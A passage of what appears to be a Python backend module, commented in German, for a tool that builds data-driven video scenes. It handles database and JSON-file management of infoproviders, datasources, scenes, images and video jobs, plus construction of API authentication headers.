datasource["api"]["api_info"]["api_key_name"] += private_config["api_keys"][api_key_name]
return {
"infoprovider_name": infoprovider_json["name"],
"datasources": infoprovider_json["datasources"],
"diagrams": infoprovider_json["images"],
"diagrams_original": infoprovider_json["diagrams_original"],
"arrays_used_in_diagrams": infoprovider_json["arrays_used_in_diagrams"]
}
def update_infoprovider(infoprovider_id, updated_data):
"""
Methode mit der die Daten eines Infoproviders verändert werden können.
:param infoprovider_id: ID des Infoproviders.
:type infoprovider_id: int
:param updated_data: Die neuen Daten mit denen der Infoprovider überschrieben werden soll.
:type updated_data: dict
:return: Enthält im Fehlerfall Informationen über den aufgetretenen Fehler.
"""
con = db.open_con_f()
assert_private_exists()
new_transform = []
# Testen ob neuer Infoprovider-Name bereits von einem anderen Infoprovider verwendet wird
count = con.execute("SELECT COUNT(*) FROM infoprovider WHERE infoprovider_name=?",
[updated_data["infoprovider_name"]]).fetchone()["COUNT(*)"]
old_infoprovider_name = con.execute("SELECT infoprovider_name FROM infoprovider WHERE infoprovider_id=?",
[infoprovider_id]).fetchone()["infoprovider_name"]
con.commit()
if count > 0 and old_infoprovider_name != updated_data["infoprovider_name"]:
return {"err_msg": f"There already exists an infoprovider with the name {updated_data['infoprovider_name']}"}
# Infoprovider-Json laden
old_file_path = _get_infoprovider_path(old_infoprovider_name)
with open_resource(old_file_path, "r") as f:
infoprovider_json = json.loads(f.read())
if old_infoprovider_name != updated_data["infoprovider_name"]:
os.remove(old_file_path)
# Neuen Infoprovider-Namen setzen
con.execute("UPDATE infoprovider SET infoprovider_name =? WHERE infoprovider_id=?",
[updated_data["infoprovider_name"], infoprovider_id])
# Update API-Step vorbereiten
api_step_new = {
"type": "request_multiple_custom",
"use_loop_as_key": True,
"steps_value": [],
"requests": []
}
datasources = copy.deepcopy(updated_data["datasources"])
for datasource in datasources:
api_key_name = f"{updated_data['infoprovider_name']}_{datasource['datasource_name']}_APIKEY" if datasource["api"]["method"] != "noAuth" and datasource["api"]["method"] != "BasicAuth" else None
header, parameter = generate_request_dicts(datasource["api"]["api_info"], datasource["api"]["method"], api_key_name=api_key_name)
url, params = update_url_pattern(datasource["api"]["api_info"]["url_pattern"])
parameter.update(params)
req_data = {
"type": datasource["api"]["api_info"]["type"],
"method": datasource["api"]["api_info"].get("method", "GET"),
"url_pattern": url,
"headers": header,
"params": parameter,
"response_type": datasource["api"]["response_type"]
}
if api_key_name:
req_data.update({"api_key_name": api_key_name})
api_step_new["steps_value"].append(datasource["datasource_name"])
api_step_new["requests"].append(req_data)
# Update Transform-Step vorbereiten
new_transform = []
for datasource in datasources:
new_transform += datasource["calculates"]
custom_keys = _extract_custom_keys(datasource["calculates"], datasource["formulas"], datasource["replacements"])
new_transform = _generate_transform(_extend_formula_keys(datasource["formulas"], datasource["datasource_name"], custom_keys), remove_toplevel_key(new_transform))
new_transform += datasource["replacements"]
datasources_copy = deepcopy(updated_data["datasources"])
for datasource in datasources_copy:
api_key_name_temp = datasource["api"]["api_info"].get("api_key_name", None)
if api_key_name_temp:
datasource["api"]["api_info"]["api_key_name"] = api_key_name_temp.split("||")[0] + "||"
if new_transform is None:
return {"err_msg": "could not generate transform-step from formulas"}
# Inhalt des Json's updaten
infoprovider_json.update({"name": updated_data["infoprovider_name"]})
infoprovider_json.update({"api": api_step_new})
infoprovider_json.update({"transform": new_transform})
infoprovider_json.update({"images": deepcopy(remove_toplevel_key(updated_data["diagrams"]))})
infoprovider_json.update({"diagrams_original": updated_data["diagrams_original"]})
infoprovider_json.update({"datasources": datasources_copy})
shutil.rmtree(os.path.join(TEMP_LOCATION, old_infoprovider_name), ignore_errors=True)
for diagram_name, diagram in updated_data["diagrams"].items():
generate_test_diagram(diagram, infoprovider_name=updated_data["infoprovider_name"], diagram_name=diagram_name)
_remove_datasources(con, infoprovider_id, datasource_names=[x["datasource_name"] for x in updated_data["datasources"]])
for datasource in updated_data["datasources"]:
datasource_name = datasource["datasource_name"]
api_key_name = f"{updated_data['infoprovider_name']}_{datasource['datasource_name']}_APIKEY" if datasource["api"]["method"] != "noAuth" and datasource["api"]["method"] != "BasicAuth" else None
header, parameter = generate_request_dicts(datasource["api"]["api_info"], datasource["api"]["method"], api_key_name=api_key_name)
url, params = update_url_pattern(datasource["api"]["api_info"]["url_pattern"])
parameter.update(params)
req_data = {
"type": datasource["api"]["api_info"]["type"],
"method": datasource["api"]["api_info"].get("method", "GET"),
"url_pattern": url,
"headers": header,
"params": parameter,
"response_type": datasource["api"]["response_type"]
}
if api_key_name:
req_data.update({"api_key_name": api_key_name})
datasource_api_step = {
"type": "request_multiple_custom",
"use_loop_as_key": True,
"steps_value": [datasource_name],
"requests": [req_data]
}
# Datasource obj vorbereiten
transform_step = []
transform_step += datasource["transform"]
transform_step += datasource["calculates"]
formulas = copy.deepcopy(datasource["formulas"])
custom_keys = _extract_custom_keys(datasource["calculates"], datasource["formulas"], datasource["replacements"])
transform_step = _generate_transform(_extend_formula_keys(formulas, datasource_name, custom_keys),
remove_toplevel_key(transform_step))
transform_step += remove_toplevel_key(datasource["replacements"])
datasource_json = {
"name": datasource_name,
"api": datasource_api_step,
"transform": transform_step,
"storing": _generate_storing(datasource["historized_data"], datasource_name, custom_keys, datasource["storing"]) if datasource["api"]["api_info"]["type"] != "request_memory" else [],
"run_config": {}
}
if len(datasource_json["storing"]) > 0 and datasource["api"]["api_info"]["type"] != "request_memory":
# Schedule für Datasource abspeichern
schedule_historisation = datasource["schedule"]
schedule_historisation_id = _insert_historisation_schedule(con, schedule_historisation)
# Datenquelle in Datenbank speichern
con.execute("INSERT INTO datasource (datasource_name, schedule_historisation_id, infoprovider_id)"
" VALUES (?, ?, ?)",
[datasource_name, schedule_historisation_id, infoprovider_id])
# add request memory, if datasource stores data
use_last = get_max_use_last(infoprovider_json["images"])
for storing_config in datasource_json["storing"]:
datasource_json["api"]["steps_value"].append(f"{datasource_json['name']}_{storing_config['key'].replace('_req|', '').replace('|', '_')}_HISTORY")
datasource_json["api"]["requests"].append({
"type": "request_memory",
"name": dict(storing_config)["name"],
"memory_folder": updated_data["infoprovider_name"] + "_" + datasource_name,
"use_last": use_last,
"alternative": {
"type": "input",
"data": [-1 for _ in range(use_last)]
}
})
else:
con.execute("INSERT INTO datasource (datasource_name, infoprovider_id) VALUES (?, ?)",
[datasource_name, infoprovider_id])
# Datasource-Json in den Ordner "/datasources" speichern
with open_resource(_get_datasource_path(updated_data["infoprovider_name"].replace(" ", "-") + "_" + datasource_name.replace(" ", "-")), "wt") as f:
json.dump(datasource_json, f)
# Neues Json abspeichern
new_file_path = get_infoprovider_file(infoprovider_id)
with open_resource(new_file_path, "w") as f:
json.dump(infoprovider_json, f)
con.commit()
return None
def get_max_use_last(diagrams=None):
"""
Ermittelt die maximal benötigte Anzahl an historisierten Werten für eine Datenquelle.
Dabei werden alle potentiellen Konfigurationen durchsucht, die auf historisierte Daten zugreifen.
:param diagrams: Liste von Diagrammen.
:type diagrams: list
:return: Index, des am weitesten zurückliegenden historisierten Wertes.
"""
max_use_last = 0
if diagrams:
for k, v in diagrams.items():
temp_max = 0
if v["diagram_config"]["sourceType"] == "Historized":
for plot in v["diagram_config"]["plots"]:
max_x = max(plot["plot"]["x"])
if max_x > temp_max:
temp_max = max_x
if temp_max > max_use_last:
max_use_last = temp_max
return max_use_last + 1
def delete_infoprovider(infoprovider_id):
"""
Entfernt den Infoprovider mit der gegebenen ID.
:param infoprovider_id: ID des Infoproviders.
:type infoprovider_id: int
:return: Boolschen Wert welcher angibt, ob das Löschen erfolgreich war.
"""
con = db.open_con_f()
# Prüfen ob der Infoproivder vorhanden ist
res = con.execute("SELECT * FROM infoprovider WHERE infoprovider_id = ?",
[infoprovider_id]).fetchone()
if res is not None:
# Json-Datei von Datenquelle, sowie zugehörige Einträge in Datenbank löschen
_remove_datasources(con, infoprovider_id, remove_historised=True)
# Json-Datei von Infoprovider und zugehörige Ordner löschen
file_path = get_infoprovider_file(infoprovider_id)
shutil.rmtree(os.path.join(TEMP_LOCATION, res["infoprovider_name"]), ignore_errors=True)
shutil.rmtree(os.path.join(IMAGE_LOCATION, res["infoprovider_name"]), ignore_errors=True)
os.remove(file_path)
# Scenen und Videos die Infoprovider verwenden löschen
scenes = con.execute("SELECT * FROM scene_uses_infoprovider WHERE infoprovider_id=?", [infoprovider_id])
for scene in scenes:
delete_scene(scene["scene_id"])
# Infoprovider aus Datenbank löschen
con.execute("DELETE FROM infoprovider WHERE infoprovider_id = ?", [infoprovider_id])
con.commit()
return True
con.commit()
return False
def get_infoprovider_logs(infoprovider_id):
"""
Läd die Logs aller Datenquellen die einem bestimmten Infoprovider angehören.
:param infoprovider_id: ID eines Infoproviders.
:type infoprovider_id: int
:return: Liste aller gefundenen Logs.
"""
con = db.open_con_f()
datasource_ids = con.execute("SELECT datasource_id FROM datasource WHERE infoprovider_id=?", [infoprovider_id])
logs = []
for datasource_id in datasource_ids:
datasource_logs = con.execute("SELECT job_id, datasource_name, state, error_msg, error_traceback, duration, start_time "
"from job_logs INNER JOIN datasource ON job_logs.job_id=datasource.datasource_id "
"WHERE pipeline_type='DATASOURCE' AND datasource.datasource_id=?"
"ORDER BY job_logs_id DESC", [datasource_id["datasource_id"]]).fetchall()
[logs.append({
"object_id": datasource_log["job_id"],
"object_name": datasource_log["datasource_name"],
"state": datasource_log["state"],
"errorMsg": datasource_log["error_msg"] if datasource_log["error_msg"] else "successful",
"errorTraceback": datasource_log["error_traceback"],
"duration": datasource_log["duration"],
"startTime": time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(datasource_log["start_time"]))
}) for datasource_log in datasource_logs]
return logs
def get_videojob_logs(videojob_id):
"""
Läd die Logs aller Datenquellen die einem bestimmten Infoprovider angehören.
:param videojob_id: ID eines Infoproviders.
:type videojob_id: int
:return: Liste aller gefundenen Logs.
"""
con = db.open_con_f()
logs = con.execute("SELECT job_id, job_name, state, error_msg, error_traceback, duration, start_time "
"from job_logs INNER JOIN job USING (job_id) "
"WHERE pipeline_type='JOB' AND job_id=?"
"ORDER BY job_logs_id DESC", [videojob_id]).fetchall()
return [{
"object_id": log["job_id"],
"object_name": log["job_name"],
"state": log["state"],
"errorMsg": log["error_msg"] if log["error_msg"] else "successful",
"errorTraceback": log["error_traceback"],
"duration": log["duration"],
"startTime": time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(log["start_time"]))
} for log in logs]
def get_all_videojobs():
"""
Läd Informationen zu allen Video-Jobs.
:return: Enthält die Keys 'job_id' und 'job_name' zu allen in der Datenbank vorhandenen Video-Jobs.
"""
con = db.open_con_f()
jobs = con.execute("SELECT job_id, job_name FROM job").fetchall()
return [{
"videojob_id": job["job_id"],
"videojob_name": job["job_name"]
} for job in jobs] if jobs else []
def delete_videojob(videojob_id):
"""
Entfernt den Videojob mit der gegebenen ID.
:param videojob_id: ID des Videojobs.
:type videojob_id: int
:return: Boolschen Wert welcher angibt ob das Löschen erfolgreich war.
"""
con = db.open_con_f()
job_list = get_job_list()
topic_id = list(filter(lambda x: x["jobId"] == videojob_id, job_list))[0]["topicValues"][0]["topicId"]
delete_topic(topic_id)
delete_job(videojob_id)
con.execute("DELETE FROM job_uses_scene WHERE job_id=?", [videojob_id])
con.commit()
return True
def get_videojob_preview(videojob_id):
"""
Generiert den Pfad zu dem Preview-Bild eines Videojobs.
:param videojob_id: ID des Videojobs.
:type videojob_id: int
:return: Dateipfad zu dem Preview-Bild.
"""
con = db.open_con_f()
scene = con.execute("SELECT * FROM job_uses_scene WHERE job_id=? AND scene_is_preview=TRUE",
[videojob_id]).fetchone()
return get_scene_preview(scene["scene_id"]) if scene else None
def insert_scene(scene):
"""
Fügt eine Szene zu der Datenbank hinzu und legt eine entsprechende Json-Datei an.
:param scene: JSON-Objekt welches die Szene beschreibt. Enthält die Keys 'scene_name', 'used_images',
'used_infoproviders', 'images', 'backgroundImage', 'backgroundType', 'backgroundColor',
'backgroundColorEnabled', 'itemCounter' und 'scene_items'.
:type scene: dict
:return: Enthält bei einem Fehler Informationen über diesen.
"""
con = db.open_con_f()
scene_name = scene["scene_name"].lower()
used_images = scene["used_images"]
used_infoproviders = scene["used_infoproviders"]
images = scene["images"]
scene_items = scene["scene_items"]
scene_json = {
"name": scene_name,
"used_images": used_images,
"used_infoproviders": used_infoproviders,
"images": remove_toplevel_key(images),
"backgroundImage": scene["backgroundImage"],
"backgroundType": scene["backgroundType"],
"backgroundColor": scene["backgroundColor"],
"backgroundColorEnabled": scene["backgroundColorEnabled"],
"itemCounter": scene["itemCounter"],
"scene_items": scene_items
}
# Prüfen ob scene bereits vorhanden ist
count = con.execute("SELECT COUNT(*) FROM scene WHERE scene_name=?", [scene_name]).fetchone()["COUNT(*)"]
if count > 0:
return "given name already in use"
# insert into scene
scene_id = con.execute("INSERT INTO scene (scene_name) VALUES (?)", [scene_name]).lastrowid
# insert into scene_uses_image
for used_image in used_images:
# check if image exists
count = con.execute("SELECT COUNT(*) FROM image WHERE image_id=?", [used_image]).fetchone()["COUNT(*)"]
if count == 0:
return f"image with id {used_image} does not exist"
con.execute("INSERT INTO scene_uses_image (scene_id, image_id) VALUES (?, ?)", [scene_id, used_image])
# insert into scene_uses_infoprovider
for used_infoprovider in used_infoproviders:
# check if infoprovider exists
count = con.execute("SELECT COUNT(*) FROM infoprovider WHERE infoprovider_id=?", [used_infoprovider]).fetchone()["COUNT(*)"]
if count == 0:
return f"infoprovider with id {used_infoprovider} does not exist"
con.execute("INSERT INTO scene_uses_infoprovider (scene_id, infoprovider_id) VALUES (?, ?)", [scene_id, used_infoprovider])
# save <scene-name>.json
file_path = _get_scene_path(scene_name.replace(" ", "-"))
with open_resource(file_path, "wt") as f:
json.dump(scene_json, f)
con.commit()
return None
def get_scene_file(scene_id):
"""
Erzeugt den Pfad zu der Json-Datei einer Szene anhand ihrer ID.
:param scene_id: ID der Szene.
:type scene_id: int
:return: Pfad zu der Json-Datei.
"""
con = db.open_con_f()
res = con.execute("SELECT scene_name FROM scene WHERE scene_id=?", [scene_id]).fetchone()
con.commit()
return _get_scene_path(res["scene_name"]) if res is not None and not None else None
def get_scene(scene_id):
"""
Läd die JSON-Datei der Szene, deren ID gegeben wird.
:param scene_id: ID der Szene.
:type scene_id: int
:return: Json-Objekt der Szenen Datei.
"""
file_path = get_scene_file(scene_id)
if file_path is None:
return None
with open_resource(file_path, "r") as f:
scene_json = json.loads(f.read())
return scene_json
def get_scene_list():
"""
Läd Informationen über alle vorhandenen Szenen.
:return: Ein JSON-Objekt mit den Keys 'scene_id' und 'scene_name' zu jeder Szene.
"""
con = db.open_con_f()
res = con.execute("SELECT * FROM scene")
con.commit()
return [{"scene_id": row["scene_id"], "scene_name": row["scene_name"]} for row in res]
def update_scene(scene_id, updated_data):
"""
Updated die JSON-Datei und die Tabelleneinträge zu einer Szene.
:param scene_id: ID der Szene.
:type scene_id: int
:param updated_data: Neue Daten der Szene.
:type updated_data: dict
:return: Enthölt bei einem Fehler Informationen über diesen.
"""
con = db.open_con_f()
scene_name = updated_data["scene_name"]
used_images = updated_data["used_images"]
used_infoproviders = updated_data["used_infoproviders"]
images = updated_data["images"]
scene_items = updated_data["scene_items"]
# Altes Json laden
old_file_path = get_scene_file(scene_id)
with open_resource(old_file_path, "r") as f:
scene_json = json.loads(f.read())
old_name = con.execute("SELECT scene_name FROM scene WHERE scene_id=?", [scene_id]).fetchone()["scene_name"]
# Testen of Name bereits von anderer Szene verwendet wird
res = con.execute("SELECT * FROM scene WHERE scene_name=?", [scene_name])
for row in res:
if row["scene_id"] != scene_id and scene_name != old_name:
return {"err_msg": f"There already exists a scene with the name {scene_name}"}
# Neuen Namen setzen
con.execute("UPDATE scene SET scene_name=? WHERE scene_id=?", [scene_name, scene_id])
# Neue Daten in Json-Datei eintragen
scene_json.update({"name": scene_name})
scene_json.update({"used_images": used_images})
scene_json.update({"used_infoproviders": used_infoproviders})
scene_json.update({"images": remove_toplevel_key(images)})
scene_json.update({"backgroundImage": updated_data["backgroundImage"]})
scene_json.update({"backgroundType": updated_data["backgroundType"]})
scene_json.update({"backgroundColor": updated_data["backgroundColor"]})
scene_json.update({"backgroundColorEnabled": updated_data["backgroundColorEnabled"]})
scene_json.update({"itemCounter": updated_data["itemCounter"]})
scene_json.update({"scene_items": scene_items})
image_files = con.execute("SELECT image_name FROM scene_uses_image AS uses INNER JOIN image ON uses.image_id = image.image_id WHERE uses.scene_id = ? AND image.folder = ?", [scene_id, "scene"])
for image_file in image_files:
if re.search(".*[_preview|_background]\.[png|jpe?g]", image_file["image_name"]):
path = get_image_path(image_file["image_name"].rsplit(".", 1)[0], "scene",
image_file["image_name"].rsplit(".", 1)[1])
os.remove(path)
# Alte Einträge aus scene_uses_image entfernen
con.execute("DELETE FROM scene_uses_image WHERE scene_id=?", [scene_id])
# Alte Einträge aus scene_uses_infoprovider entfernen
con.execute("DELETE FROM scene_uses_infoprovider WHERE scene_id=?", [scene_id])
# Neue Einträge in scene_uses_image einfügen
for used_image in used_images:
# Testen ob Image in Tabelle vorhanden ist
count = con.execute("SELECT COUNT(*) FROM image WHERE image_id=?", [used_image]).fetchone()["COUNT(*)"]
if count == 0:
return {"err_msg": f"Image with ID {used_image} does not exist"}
# In scene_uses_image eintragen
con.execute("INSERT INTO scene_uses_image (scene_id, image_id) VALUES (?, ?)", [scene_id, used_image])
# Neue Einträge in scene_uses_infoprovider einfügen
for used_infoprovider in used_infoproviders:
# Testen ob Infoproivder in Tabelle vorhanden ist
count = con.execute("SELECT COUNT(*) FROM infoprovider WHERE infoprovider_id=?", [used_infoprovider]).fetchone()["COUNT(*)"]
if count == 0:
return {"err_msg": f"Infoprovider with ID {used_infoprovider} does not exist"}
# In scene_uses_infoprovider eintragen
con.execute("INSERT INTO scene_uses_infoprovider (scene_id, infoprovider_id) VALUES (?, ?)", [scene_id, used_infoprovider])
# Neues Json abspeichern
new_file_path = _get_scene_path(scene_name)
if new_file_path != old_file_path:
os.remove(old_file_path)
with open_resource(new_file_path, "w") as f:
json.dump(scene_json, f)
video_ids = [x["job_id"] for x in list(con.execute("SELECT * FROM job_uses_scene WHERE scene_id=?", [scene_id]))]
video_jsons = [get_videojob(x) for x in video_ids]
for index, video_json in enumerate(video_jsons):
video_scene_names = [x["sceneName"] for x in video_json["sceneList"]]
video_json["images"] = {f"{i}_{x}": {"key": x} for i, x in enumerate(video_scene_names)}
insert_video_job(video_json, True, video_ids[index])
con.commit()
return None
def delete_scene(scene_id):
"""
Entfernt eine Szene aus der Datenbank und löscht die zugehörige Json-Datei.
:param scene_id: ID der Szene.
:type scene_id: int
:return: Zeigt an ob das Löschen erfolgreich war.
"""
con = db.open_con_f()
# testen ob scene vorhanden ist
res = con.execute("SELECT * FROM scene WHERE scene_id=?", [scene_id]).fetchone()
if res:
file_path = get_scene_file(scene_id)
image_files = con.execute("SELECT image_name FROM scene_uses_image AS uses INNER JOIN image ON uses.image_id = image.image_id WHERE uses.scene_id = ? AND image.folder = ?", [scene_id, "scene"])
for image_file in image_files:
if re.search(".*[_preview|_background]\.[png|jpe?g]", image_file["image_name"]):
path = get_image_path(image_file["image_name"].rsplit(".", 1)[0], "scene", image_file["image_name"].rsplit(".", 1)[1])
os.remove(path)
# Eintrag aus scene_uses_image entfernen
con.execute("DELETE FROM scene_uses_image WHERE scene_id=?", [scene_id])
# Eintrag aus scene_uses_infoprovider entfernen
con.execute("DELETE FROM scene_uses_infoprovider WHERE scene_id=?", [scene_id])
# Lösche Video-jobs die diese Szene verwenden
jobs = con.execute("SELECT * FROM job_uses_scene WHERE scene_id=?", [scene_id])
for job in jobs:
delete_videojob(job["job_id"])
# Json-Datei löschen
rowcount = con.execute("DELETE FROM scene WHERE scene_id=?", [scene_id]).rowcount
if rowcount > 0:
os.remove(file_path)
con.commit()
return True
con.commit()
return False
def get_scene_preview(scene_id):
"""
Läd das Preview-Bild einer Szene
:param scene_id: ID der Szene.
:type scene_id: int
"""
con = db.open_con_f()
# Testen ob Scene existiert
count = con.execute("SELECT COUNT(*) FROM scene WHERE scene_id=?", [scene_id]).fetchone()["COUNT(*)"]
if count == 0:
return None
# Szenen-Json laden um verwendetet Bilder auslesen zu können
with open_resource(get_scene_file(scene_id)) as f:
scene_json = json.loads(f.read())
# Nach Preview-Bild suchen
for image_id in scene_json["used_images"]:
image_name = con.execute("SELECT image_name FROM image WHERE image_id=?", [image_id]).fetchone()["image_name"]
if "preview" in image_name:
image_data = image_name.rsplit(".", 1)
return get_image_path(image_data[0], "scene", image_data[1])
return None
def insert_image(image_name, folder):
"""
Fügt ein Bild zu der Datenbank hinzu.
:param image_name: Name des Bildes.
:type image_name: str
:param folder: Ordner unter dem das Bild gespeichert werden soll.
:type folder: str
"""
con = db.open_con_f()
image_id = con.execute("INSERT INTO image (image_name, folder) VALUES (?, ?)", [image_name, folder]).lastrowid
con.commit()
return image_id
def get_scene_image_file(image_id):
"""
Generiert den Dateipfad zu einem Bild anhand seiner ID.
:param image_id: ID des Bildes.
:type image_id: int
"""
con = db.open_con_f()
res = con.execute("SELECT * FROM image WHERE image_id=?", [image_id]).fetchone()
con.commit()
return get_image_path(res["image_name"].rsplit(".", 1)[0], res["folder"], res["image_name"].rsplit(".", 1)[1]) if res is not None else None
def get_image_list(folder):
"""
Läd Informationen über alle in der Datenbank enthaltenen Bilder.
:return: Enthölt eine Liste an Objekten welche je die ID und den Namen des Bildes enthalten.
"""
con = db.open_con_f()
res = con.execute("SELECT * FROM image WHERE folder=?", [folder])
con.commit()
return [{"image_id": row["image_id"],
"image_name": row["image_name"],
"path": get_image_path(row["image_name"].rsplit(".", 1)[0], folder, row["image_name"].rsplit(".", 1)[1])} for row in res]
def delete_scene_image(image_id):
"""
Entfernt ein Bild aus der Datenbank.
:param image_id: ID des Bildes.
:type image_id: int
"""
con = db.open_con_f()
file_path = get_scene_image_file(image_id)
# Entferne Szenen und Videos die dieses Bild verwenden
res = con.execute("SELECT * FROM scene_uses_image WHERE image_id=?", [image_id])
for scene in res:
delete_scene(scene["scene_id"])
# Entfernen Datei aus Ordnerstruktur und Eintrag aus Tabelle 'image'
res = con.execute("DELETE FROM image WHERE image_id=?", [image_id])
if res.rowcount > 0:
os.remove(file_path)
con.commit()
return "Successful"
def set_videojob_preview(videojob_id, scene_id):
"""
Setzt eine gegebene Szene als das Preview-Bild eines Videos.
:param videojob_id: ID eines Video-Jobs.
:type videojob_id: int
:param scene_id: ID einer Szene.
:type scene_id: int
:return: Eine Fehlermeldung im JSON-Format falls vorhanden.
"""
con = db.open_con_f()
# Testen ob Videojob und Szene existieren
scene = con.execute("SELECT * FROM scene WHERE scene_id=?", [scene_id]).fetchone()
videojob = con.execute("SELECT * FROM job WHERE job_id=?", [videojob_id]).fetchone()
if videojob is None:
return {"err_msg": f"Videojob with ID {videojob_id} does not exist"}
if scene is None:
return {"err_msg": f"Scene with ID {scene_id} does not exist"}
# Testen ob bereits eine Szene als preview gesetzt ist
count = con.execute("SELECT COUNT(*) FROM job_uses_scene WHERE job_id=? AND scene_is_preview=TRUE",
[videojob_id]).fetchone()["COUNT(*)"]
if count == 0:
con.execute("INSERT INTO job_uses_scene (job_id, scene_id, scene_is_preview) VALUES (?, ?, ?)",
[videojob_id, scene_id, True])
else:
con.execute("UPDATE job_uses_scene SET scene_id=? WHERE job_id=? AND scene_is_preview=TRUE",
[scene_id, videojob_id])
con.commit()
return None
def get_topic_names():
con = db.open_con_f()
res = con.execute("SELECT steps_id, steps_name, json_file_name FROM steps")
return [{"topicId": row["steps_id"], "topicName": row["steps_name"],
"topicInfo": _get_topic_info(row["json_file_name"])} for row in res]
def get_topic_file(topic_id):
con = db.open_con_f()
res = con.execute("SELECT json_file_name FROM steps WHERE steps_id = ?", [topic_id]).fetchone()
return _get_steps_path(res["json_file_name"].replace(".json", "")) if res is not None else None
def delete_topic(topic_id):
con = db.open_con_f()
file_path = get_topic_file(topic_id)
res = con.execute("DELETE FROM steps WHERE steps_id = ?", [topic_id])
con.commit()
if (res.rowcount > 0):
os.remove(file_path)
def add_topic_get_id(name, file_name):
con = db.open_con_f()
topic_id = con.execute("INSERT INTO steps (steps_name,json_file_name)VALUES (?, ?)",
[name, file_name]).lastrowid
con.commit()
return topic_id
def add_topic(name, file_name):
con = db.open_con_f()
con.execute("INSERT INTO steps (steps_name,json_file_name)VALUES (?, ?)",
[name, file_name])
con.commit()
def get_params(topic_id):
con = db.open_con_f()
res = con.execute("SELECT json_file_name FROM steps WHERE steps_id = ?", [topic_id]).fetchone()
if res is None:
return None
steps_json = _get_topic_steps(res["json_file_name"])
run_config = steps_json["run_config"]
return humps.camelize(_to_param_list(run_config))
def get_job_list():
con = db.open_con_f()
res = con.execute("""
SELECT
job_id, job_name,
schedule.type AS s_type, time, STRFTIME('%Y-%m-%d', date) as date, time_interval, next_execution,
delete_options.type AS d_type, days, hours, k_count, fix_names_count,
GROUP_CONCAT(DISTINCT weekday) AS weekdays,
COUNT(DISTINCT position_id) AS topic_count,
GROUP_CONCAT(DISTINCT steps.steps_id || "::" || steps_name || "::" || json_file_name || "::" || position) AS topic_positions,
GROUP_CONCAT(DISTINCT position || "::" || key || "::" || value || "::" || job_config.type) AS param_values
FROM job
INNER JOIN schedule USING (schedule_id)
LEFT JOIN schedule_weekday USING (schedule_id)
INNER JOIN delete_options USING (delete_options_id)
INNER JOIN job_topic_position USING (job_id)
LEFT JOIN job_config USING (position_id)
INNER JOIN steps USING (steps_id)
GROUP BY (job_id)
""")
return [_row_to_job(row) for row in res]
def insert_job(job, config=True):
con = db.open_con_f()
job_name = job["jobName"]
schedule = job["schedule"]
delete_schedule = job["deleteSchedule"]
topic_values = job["topicValues"]
schedule_id = _insert_schedule(con, schedule)
delete_options_id = _insert_delete_options(con, delete_schedule)
job_id = con.execute(
"INSERT INTO job(job_name, schedule_id, delete_options_id) "
"VALUES(?, ?, ?)",
[job_name, schedule_id, delete_options_id]).lastrowid
_insert_param_values(con, job_id, topic_values, config=config)
con.commit()
def delete_job(job_id):
con = db.open_con_f()
con.execute("PRAGMA foreign_keys = ON")
schedule_id = con.execute("SELECT schedule_id FROM job WHERE job_id=?", [job_id]).fetchone()["schedule_id"]
delete_options_id = con.execute("SELECT delete_options_id FROM job WHERE job_id=?", [job_id]).fetchone()[
"delete_options_id"]
con.execute("DELETE FROM schedule WHERE schedule_id=?", [schedule_id])
con.execute("DELETE FROM delete_options WHERE delete_options_id=?", [delete_options_id])
con.commit()
def update_job(job_id, updated_data, config=True):
con = db.open_con_f()
for key, value in updated_data.items():
if key == "jobName":
con.execute("UPDATE job SET job_name=? WHERE job_id=?", [value, job_id])
if key == "schedule":
old_schedule_id = con.execute("SELECT schedule_id FROM job WHERE job_id=?", [job_id]).fetchone()[
"schedule_id"]
con.execute("DELETE FROM schedule WHERE schedule_id=?", [old_schedule_id])
con.execute("DELETE FROM schedule_weekday WHERE schedule_id=?", [old_schedule_id])
schedule_id = _insert_schedule(con, value)
con.execute("UPDATE job SET schedule_id=? WHERE job_id=?", [schedule_id, job_id])
if key == "deleteSchedule":
old_delete_options_id = \
con.execute("SELECT delete_options_id FROM job WHERE job_id=?", [job_id]).fetchone()[
"delete_options_id"]
con.execute("DELETE FROM delete_options WHERE delete_options_id=?", [old_delete_options_id])
delete_options_id = _insert_delete_options(con, value)
con.execute("UPDATE job SET delete_options_id=? WHERE job_id=?", [delete_options_id, job_id])
if key == "topic_values":
pos_id_rows = con.execute("SELECT position_id FROM job_topic_position WHERE job_id=?", [job_id])
pos_ids = [(row["position_id"],) for row in pos_id_rows]
con.execute("DELETE FROM job_topic_position WHERE job_id=?", [job_id])
con.executemany("DELETE FROM job_config WHERE position_id=?", pos_ids)
_insert_param_values(con, job_id, value, config=config)
con.commit()
def get_logs():
con = db.open_con_f()
logs = con.execute(
"SELECT "
"job_id, job_name, state, error_msg, error_traceback, duration, start_time "
"from job_logs INNER JOIN job USING (job_id) "
"ORDER BY job_logs_id DESC").fetchall()
return [{
"jobId": log["job_id"],
"jobName": log["job_name"],
"state": log["state"],
"errorMsg": log["error_msg"],
"errorTraceback": log["error_traceback"],
"duration": log["duration"],
"startTime": log["start_time"]
}
for log in logs]
def generate_request_dicts(api_info, method, api_key_name=None):
"""
Falls die API einen Key benötigt, gibt es verschiedene Varianten, wie der Key in der Request übergeben wird (Query,
Header, verschlüsselt etc.). Dazu wird der Key in dem entsprechenden Dict verpackt bzw. der eigentliche Key wird in
der privaten Konfig-Datei abgelegt.
:param api_info: Infos über die Request (Typ, URL etc.)
:type api_info: dict
:param method: Methode, wie der Key in der Request übergeben werden soll
:type method: str
:param api_key_name: Name des Keys, falls er in der privaten Konfig-Datei abgespeichert werden soll
:type api_key_name: str
:return: Aufbereitete Header- und Parameter-Dictionaries
"""
header = {}
parameter = {}
if method != "noAuth" and method != "BearerToken":
api_key_for_query = api_info["api_key_name"].split("||")[0]
api_key = api_info["api_key_name"].split("||")[1]
elif method == "BearerToken":
api_key = api_info["api_key_name"]
else:
return header, parameter
if api_key_name:
private_config = get_private()
private_config["api_keys"].update({api_key_name: api_key})
set_private(private_config)
# Prüft ob und wie sich das Backend bei der API authetifizieren soll und setzt die entsprechenden Parameter
if method == "BearerToken":
header.update({"Authorization": "Bearer " + ("{_api_key}" if api_key_name else api_key)})
else:
if method == "BasicAuth":
header.update({"Authorization": "Basic " + b64encode(api_key_for_query.encode("utf-8") + b":" + api_key.encode("utf-8"))
.decode("utf-8")})
elif method == "KeyInHeader":
header.update({api_key_for_query: "{_api_key}" if api_key_name else api_key})
elif method == "KeyInQuery":
parameter.update({api_key_for_query: "{_api_key}" if api_key_name else api_key})
return header, parameter
def _extract_custom_keys(calculates, formulas, replacements):
keys = []
